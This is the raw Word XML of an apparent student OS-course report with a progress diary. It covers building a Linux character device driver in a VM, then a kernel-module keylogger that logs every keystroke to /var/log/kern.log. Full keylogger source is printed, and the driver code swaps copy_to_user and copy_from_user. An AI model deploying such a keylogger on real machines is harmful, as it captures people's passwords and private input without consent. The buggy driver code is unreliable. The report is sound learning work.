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DD" w:rsidRPr="00476FA2" w:rsidRDefault="00F07EDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pP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  <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476FA2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Introduce Running Environment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  <w:u w:val="single"/>
        </w:rPr>
      </w:pP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  <w:r w:rsidRPr="00476FA2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>OS: Windows 10 with VirtualBox VM.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  <w:r w:rsidRPr="00476FA2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>CPU: 2 CPUs, Execution Cap 100%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  <w:r w:rsidRPr="00476FA2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Motherboard: 2048MB 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  <w:r w:rsidRPr="00476FA2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Storage: 40GB Dynamic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  <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476FA2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Progress Diary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE13C0" w:rsidRPr="00476FA2" w:rsidRDefault="00CE13C0" w:rsidP="00CE13C0">
      <w:pPr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4"/>
        <w:gridCol w:w="580"/>
        <w:gridCol w:w="1150"/>
        <w:gridCol w:w="5971"/>
        <w:gridCol w:w="985"/>
      </w:tblGrid>
      <w:tr w:rsidR="001276D2" w:rsidRPr="00476FA2" w:rsidTr="001276D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="664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Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="580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1150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5971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985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0" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B5631D" w:rsidRPr="00476FA2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Create virtual machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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Took a few moments to decide how much CPU, and storage to dedicate to the virtual machine. There was an option asking to create a dynamic or fixed size of the drive to be used in the virtual machine, I chose dynamic with a base of 40GB space.</w:t>
            </w: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B5631D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/9</w:t>
            </w:r>
          </w:p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B5631D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/9</w:t>
            </w:r>
          </w:p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mins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0" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B5631D" w:rsidRPr="00476FA2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Install Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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B5631D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/9</w:t>
            </w:r>
          </w:p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B5631D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/9</w:t>
            </w:r>
          </w:p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mins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0" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B5631D" w:rsidRPr="00476FA2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Write character device driver with functions to open, close, read and write a device</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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Researched on Google a few articles and videos on how to write this program.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B5631D" w:rsidRPr="00476FA2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4583E3A0" wp14:editId="6FC04245">
                  <wp:extent cx="3416486" cy="2200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743" cy="227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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001276D2" w:rsidRPr="00476FA2" w:rsidTr="001276D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="664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0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Make node in /dev/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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mknod /dev/s3560494Device c 245 0</w:t>
            </w:r>
          </w:p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Above instruction is to create a character device with major number 245 and minor number 0.</w:t>
            </w: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0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Load developed module </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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sudo insmod myDev.ko in terminal</w:t>
            </w:r>
          </w:p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0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 permissi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>on to device driver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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Run sudo chmod 777 /dev/s3560494Device </w:t>
            </w:r>
          </w:p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ensure that you can run the device</w:t>
            </w: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0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 user application to write and read any message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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Full code shown below</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985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1276D2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/10</w:t>
            </w:r>
          </w:p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1276D2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/10</w:t>
            </w:r>
          </w:p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 date: 3/10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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B5631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505200" cy="1924050"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="4" name="Picture 4" descr="C:\Users\Gerald\AppData\Local\Microsoft\Windows\INetCache\Content.Word\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erald\AppData\Local\Microsoft\Windows\INetCache\Content.Word\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:rsidR="00200A8D" w:rsidRDefault="00200A8D" w:rsidP="00200A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1276D2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/10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00200A8D" w:rsidRDefault="00200A8D" w:rsidP="00200A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1276D2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/10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B5631D" w:rsidRDefault="00200A8D" w:rsidP="00200A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 date: 3/10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 on what kind of driver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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Decided to make a keylogger driver</w:t>
            </w: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5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Finding suitable keymap on google</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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D75025D" wp14:editId="53714B50">
                  <wp:extent cx="3475117" cy="1628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770" cy="16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B5631D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001276D2" w:rsidRPr="00476FA2" w:rsidTr="001276D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="664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0" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B5631D" w:rsidRDefault="00B5631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150" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B5631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Write device driver </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B5631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Device driver </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">that will take in inputs from keyboard, and write these inputs to a kern.log file located </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>in /var/log/kern.log</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00200A8D" w:rsidRP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 is shown below</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B5631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200A8D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00200A8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200A8D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00200A8D" w:rsidRPr="00476FA2" w:rsidTr="001276D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="664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0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150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Insert .ko file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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sudo insmod keylogger.ko</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00200A8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200A8D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00200A8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200A8D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00200A8D" w:rsidRPr="00476FA2" w:rsidTr="001276D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="664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0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150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log file for inputs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971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 /var/log/kern.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00200A8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200A8D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00200A8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200A8D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00200A8D" w:rsidRPr="00476FA2" w:rsidTr="001276D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="664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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="580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150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result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5971" w:type="dxa"/>
          </w:tcPr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4565290" cy="2790825"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="0"/>
                  <wp:docPr id="5" name="Picture 5" descr="C:\Users\Gerald\AppData\Local\Microsoft\Windows\INetCache\Content.Word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erald\AppData\Local\Microsoft\Windows\INetCache\Content.Word\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593" cy="279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:rsidR="00200A8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200A8D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00200A8D" w:rsidRDefault="001276D2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bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r w:rsidR="00200A8D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/10</w:t>
            </w:r>
          </w:p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</w:p>
          <w:p w:rsidR="00200A8D" w:rsidRDefault="00200A8D" w:rsidP="00CE13C0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CE13C0" w:rsidRDefault="00CE13C0" w:rsidP="00CE13C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A639CB" w:rsidRDefault="00A639CB" w:rsidP="00CE13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Listed here is the complete code for the character device driver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&lt;linux/module.h&gt;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&lt;linux/kernel.h&gt;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&lt;linux/fs.h&gt;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&lt;linux/cdev.h&gt;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&lt;linux/semaphore.h&gt;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&lt;asm/uaccess.h&gt;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en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>// Create a structure for device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virtual_device{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char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data[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100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];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sempahore sem;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}myDevice;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en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>// To later register device we need cdev object and other variables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cdev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mcdev;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major_number;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ret;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dev_t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dev_num;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#define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DEVICE_NAME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"s3560494Device"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device_open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inode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inode,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file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filp){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down_interruptible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virtual_device.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sem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)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!=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(KERN_ALERT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"could not lock device during open"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-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"opened device"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ssize_t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device_read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file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filp,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char*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bufStoreData, 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size_t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bufCount, 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loff_t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curOffset){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"reading from device"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    ret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="00336D3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copy_from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_user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(bufStoreData, virtual_device.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data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 bufCount);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ret;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ssize_t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device_write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file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filp,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const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char*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bufSourceData, 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size_t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bufCount, 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loff_t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curOffset){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"writing to device"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    ret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copy_to_user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(virtual_device.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data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 bufSourceData, bufCount);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ret;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device_close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inode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inode,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file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filp){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up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virtual_device.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sem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"closed device"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file_operations fops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owner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THIS_MODULE,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open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device_open,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release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device_close,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write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device_write,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read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device_read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static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driver_entry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void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    ret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alloc_chrdev_region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dev_num,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,DEVICE_NAME);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(ret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&lt;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(KERN_ALERT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"failed to allocate major number"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ret;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    major_number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MAJOR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(dev_num);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"major number is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%d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 major_number);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lastRenderedPageBreak/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\t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use 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\"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mknod /dev/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%s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 c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%d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 0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\"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 for device file"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 DEVICE_NAME, major_number);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en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>// step 2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    mcdev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cdev_alloc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mcdev-&gt;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ops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fops;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mcdev-&gt;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owner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THIS_MODULE;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    ret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cdev_add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(mcdev, dev_num,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(ret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&lt;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(KERN_ALERT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"unable to add cdev to kernel"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ret;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sema_init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virtual_device.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sem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   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static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void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driver_exit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void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cdev_del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(mcdev);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unregister_chrdev_region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(dev_num,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(KERN_ALERT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"unloaded module"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en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>//Inform kernel where to enter and exit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module_init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(driver_entry);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module_exit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(driver_exit);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Default="00A639CB" w:rsidP="00CE13C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A639CB" w:rsidRDefault="00A639CB" w:rsidP="00CE13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 is the complete code for the makefile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obj-m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:= myDev.o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KERNEL_DIR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= /usr/src/linux-headers-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$(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shell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 uname -r)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all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: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$(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MAKE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)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-C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$(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A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KERNEL_DIR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)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SUBDIRS=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$(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shell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 pwd)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modules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clean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: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rm -rf *.o *.ko *.mod.* *.symvers *.order *~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Default="00A639CB" w:rsidP="00CE13C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A639CB" w:rsidRDefault="00A639CB" w:rsidP="00CE13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 is the code for the user application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&lt;stdio.h&gt;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&lt;stdlib.h&gt;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&lt;fcntl.h&gt;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&lt;unistd.h&gt;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#define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DEVICE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"/dev/s3560494Device"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main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() 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i, fd;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char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ch, write_buf[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100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], read_buf[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100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];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    fd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open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(DEVICE, O_RDWR); </w:t>
      </w:r>
      <w:r w:rsidRPr="00A639CB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en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>//open for reading and writing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(fd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==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-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printf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"file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%s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 either does not exist or has been locked by another process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,DEVICE);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exit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-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printf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"r = read from device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w = write to device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enter command: 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scanf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%c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ch);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switch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(ch){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case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'w'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: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printf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"enter data: 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scanf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 %[^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]"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 write_buf);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write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(fd, write_buf,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sizeof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(write_buf));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break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case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'r'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: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read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(fd, read_buf, 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sizeof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(read_buf));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printf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"device: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%s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 read_buf);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break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default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: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printf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"command not recognized</w:t>
      </w:r>
      <w:r w:rsidRPr="00A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A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break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close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(fd);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    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    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A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A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A639C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A639CB" w:rsidRPr="00A639CB" w:rsidRDefault="00A639CB" w:rsidP="00A639CB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A639CB" w:rsidRDefault="00A639CB" w:rsidP="00CE13C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B5631D" w:rsidRDefault="00B5631D" w:rsidP="00CE13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Listed below is the code for the keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5631D" w:rsidRDefault="00B5631D" w:rsidP="00CE13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bear in mind that the keymap was taken from google as it will be too tiresome to write it all out.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&lt;linux/module.h&gt;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&lt;linux/kernel.h&gt;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&lt;linux/init.h&gt;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&lt;linux/keyboard.h&gt;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#include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&lt;linux/semaphore.h&gt;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#define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DRIVER_AUTHOR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"Gerald Lim  "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#define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DRIVER_DESC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"A keylogger device driver"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#define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DRIVER_LICENSE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"GPL"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semaphore sem;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static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const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char*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keymap[]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{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"ESC"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"1"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"2"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"3"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"4"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"5"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"6"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"7"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"8"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"9"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"0"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"-"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"="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"_BACKSPACE_"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"_TAB_"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"q"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"w"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"e"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"r"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"t"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"y"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"u"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"i"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"o"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"p"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"["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"]"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"_ENTER_"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"_CTRL_"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"a"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"s"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"d"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"f"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"g"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"h"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"j"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"k"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"l"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";"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"'"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"`"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"_SHIFT_"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\\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"z"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"x"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"c"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"v"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"b"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"n"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"m"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","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"."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"/"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"_SHIFT_"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 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"_CAPSLOCK_"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"_F1_"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"_F2_"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"_F3_"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"_F4_"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"_F5_"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"_F6_"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"_F7_"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"_F8_"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"_F9_"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"_F10_"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"_NUMLOCK_"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"_SCROLLLOCK_"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"_HOME_"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"_UP_"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"_PGUP_"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"-"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"_LEFT_"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"5"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"_RTARROW_"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"+"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"_END_"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"_DOWN_"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"_PGDN_"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"_INS_"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"_DEL_"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"_F11_"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"_F12_"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"_ENTER_"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"CTRL_"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"/"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"_PRTSCR_"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"ALT"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"_HOME_"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"_UP_"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"_PGUP_"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"_LEFT_"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"_RIGHT_"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"_END_"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"_DOWN_"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"_PGDN_"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"_INSERT_"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"_DEL_"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"_PAUSE_"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static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const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char*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keymapShift[]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{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"ESC"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"!"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"@"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"#"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"$"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"%"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"^"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"&amp;"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"*"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"("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")"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"+"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"_BACKSPACE_"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"_TAB_"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"Q"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"W"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"E"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"R"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"T"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"Y"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"U"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"I"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"O"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"P"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"{"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"}"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"_ENTER_"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"_CTRL_"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"A"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"S"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"D"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"F"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"G"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"H"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"J"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"K"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"L"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":"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\"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"~"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"_SHIFT_"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"|"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"Z"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"X"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"C"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"V"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"B"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"N"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"M"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"&lt;"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"&gt;"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"?"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"_SHIFT_"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 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"_CAPSLOCK_"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"_F1_"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"_F2_"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"_F3_"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"_F4_"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"_F5_"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"_F6_"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"_F7_"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lastRenderedPageBreak/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"_F8_"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"_F9_"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"_F10_"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"_NUMLOCK_"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"_SCROLLLOCK_"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"_HOME_"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"_UP_"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"_PGUP_"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"-"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"_LEFT_"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"5"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"_RTARROW_"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"+"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"_END_"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"_DOWN_"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"_PGDN_"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"_INS_"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"_DEL_"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"_F11_"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"_F12_"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"_ENTER_"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"CTRL_"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"/"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"_PRTSCR_"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"ALT"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"_HOME_"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"_UP_"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"_PGUP_"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"_LEFT_"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"_RIGHT_"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"_END_"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"_DOWN_"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"_PGDN_"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"_INSERT_"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"_DEL_"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       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\0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,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"_PAUSE_"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static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shiftKey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static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notifier_block keylogger_nb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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563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notifier_call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keylogger_notify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keylogger_notify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notifier_block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nblock,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unsigned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long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code,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void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_param)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struct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keyboard_notifier_param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*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param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_param;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(code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==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KBD_KEYCODE)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 param-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563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value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==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42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||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param-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563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value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==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54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)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en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>// acquire lock to modify the global variable shiftKey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down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sem);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(param-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563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down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shiftKey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else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shiftKey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up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sem);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NOTIFY_OK;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(param-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563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down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en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>// acquire lock to read the global variable shiftKey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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        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down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sem);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if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(shiftKey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==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%s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 keymap[param-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563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value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]);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else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%s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, keymapShift[param-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563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n-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>value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]);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    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up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sem);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    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NOTIFY_OK;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static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int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__init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init_keylogger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void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en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>// Register this module to maintain notification list with kb driver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register_keyboard_notifier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keylogger_nb);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"Registering keylogger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sema_init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sem, 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1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return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n-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>0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static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void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__exit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cleanup_keylogger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void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{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unregister_keyboard_notifier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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563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n-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>&amp;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keylogger_nb);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    </w:t>
      </w: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printk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 xml:space="preserve">(KERN_INFO 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 xml:space="preserve">"Unregistered keylogger </w:t>
      </w:r>
      <w:r w:rsidRPr="00B563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n-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563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n-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>"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}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module_init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(init_keylogger);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module_exit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(cleanup_keylogger);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MODULE_LICENSE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(DRIVER_LICENSE);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MODULE_AUTHOR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(DRIVER_AUTHOR);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5631D" w:rsidRPr="00B5631D" w:rsidRDefault="00B5631D" w:rsidP="00B5631D">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00B563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n-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>MODULE_DESCRIPTION</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5631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US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>(DRIVER_DESC);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5631D" w:rsidRPr="00476FA2" w:rsidRDefault="00B5631D" w:rsidP="00CE13C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B5631D" w:rsidRPr="00476F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E67" w:rsidRDefault="004E1E67" w:rsidP="00CE13C0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004E1E67" w:rsidRDefault="004E1E67" w:rsidP="00CE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E67" w:rsidRDefault="004E1E67" w:rsidP="00CE13C0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004E1E67" w:rsidRDefault="004E1E67" w:rsidP="00CE1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31D" w:rsidRPr="00CE13C0" w:rsidRDefault="00B5631D" w:rsidP="00CE13C0">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4680"/>
      </w:tabs>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00CE13C0">
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      </w:rPr>
      <w:t>COSC1114</w:t>
    </w:r>
    <w:r w:rsidRPr="00CE13C0">
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      </w:rPr>
      <w:tab/>
      <w:t>Gerald Lim</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00B5631D" w:rsidRPr="00CE13C0" w:rsidRDefault="00B5631D" w:rsidP="00CE13C0">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4680"/>
      </w:tabs>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00CE13C0">
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      </w:rPr>
      <w:t>Semester 2</w:t>
    </w:r>
    <w:r w:rsidRPr="00CE13C0">
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      </w:rPr>
      <w:tab/>
      <w:t>s3560494</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00B5631D" w:rsidRPr="00CE13C0" w:rsidRDefault="00B5631D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00CE13C0">
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      </w:rP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C0"/>
    <w:rsid w:val="000C1CC6"/>
    <w:rsid w:val="001276D2"/>
    <w:rsid w:val="00200A8D"/>
    <w:rsid w:val="0024175D"/>
    <w:rsid w:val="00336D3B"/>
    <w:rsid w:val="00475D49"/>
    <w:rsid w:val="00476FA2"/>
    <w:rsid w:val="004E1E67"/>
    <w:rsid w:val="00665B65"/>
    <w:rsid w:val="0068041F"/>
    <w:rsid w:val="007901CE"/>
    <w:rsid w:val="00A639CB"/>
    <w:rsid w:val="00AB3C5A"/>
    <w:rsid w:val="00B5631D"/>
    <w:rsid w:val="00BE49DF"/>
    <w:rsid w:val="00C3700B"/>
    <w:rsid w:val="00CB28C8"/>
    <w:rsid w:val="00CD6CAF"/>
    <w:rsid w:val="00CE13C0"/>
    <w:rsid w:val="00D91A4F"/>
    <w:rsid w:val="00F07EDD"/>
    <w:rsid w:val="00F62561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AE86"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7CF58E3C-5D79-4E6D-BC45-5BB79DBA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13C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A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3C0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE1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3C0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Standard">
    <w:name w:val="Standard"/>
    <w:rsid w:val="00CE13C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AU" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
